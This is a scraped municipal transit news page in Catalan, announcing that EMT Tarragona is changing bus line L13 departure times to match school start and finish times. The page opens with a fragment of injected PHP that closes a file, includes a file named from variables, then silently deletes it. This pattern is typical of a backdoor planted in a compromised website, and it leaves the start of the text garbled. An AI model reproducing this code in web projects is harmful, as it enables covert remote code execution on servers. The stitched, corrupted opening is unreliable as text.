");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> L'EMT de Tarragona modifica els horaris de la L13 per adaptar-los millor a les entrades i sortides dels centres escolars
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

L'EMT de Tarragona modifica els horaris de la L13 per adaptar-los millor a les entrades i sortides dels centres escolars (10/05/2021)

L’Empresa Municipal de Transports (EMT) ha modificat els horaris de la línia 13 que fa el recorregut Entrepins – Passeig de les Palmeres. Els canvis afecten, principalment, als horaris de matí i migdia i s’han fet amb l’objectiu d’adaptar-los millor a les entrades i sortides dels centres escolars. El canvi es farà efectiu el proper dilluns 17 de maig.

En aquest sentit, les sortides d’Entrepins de les 07:41, 8:45 i 9:45 h s’avancen a les 07:20, les 08:20 i les 9:32 h, respectivament. D’aquesta manera, la freqüència de pas permet l’arribada a temps als centres escolars que obren a les 8:00, les 9:00 i les 10:00 hores.

En sentit contrari, també es modifiquen algunes sortides des del Passeig de les Palmeres per tal que els usuaris tinguin temps suficient d’arribar a la parada un cop acabades les classes. Els autobusos que surten ara a les 14:38 i a les 17:03 es retarden fins les 14:40 i les 17:20 h, respectivament.

Segons Jordi Fortuny, el transport públic municipal “és un servei ciutadà i hem de garantir que s’adapta a les necessitats de la població per tal d’oferir la màxima qualitat possible”.

La modificació de la L13 sorgeix després d’una reunió entre la Federació de Veïns de Llevant i els responsables de l’EMT, on es va exposar la necessitat d’adaptar la línia a les condicions d’ús dels veïns i veïnes de la zona, principals usuaris de la mateixa.

Font: Ajuntament de Tarragona

L'EMT de Tarragona modifica els horaris de la L13 per adaptar-los millor a les entrades i sortides dels centres escolars

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona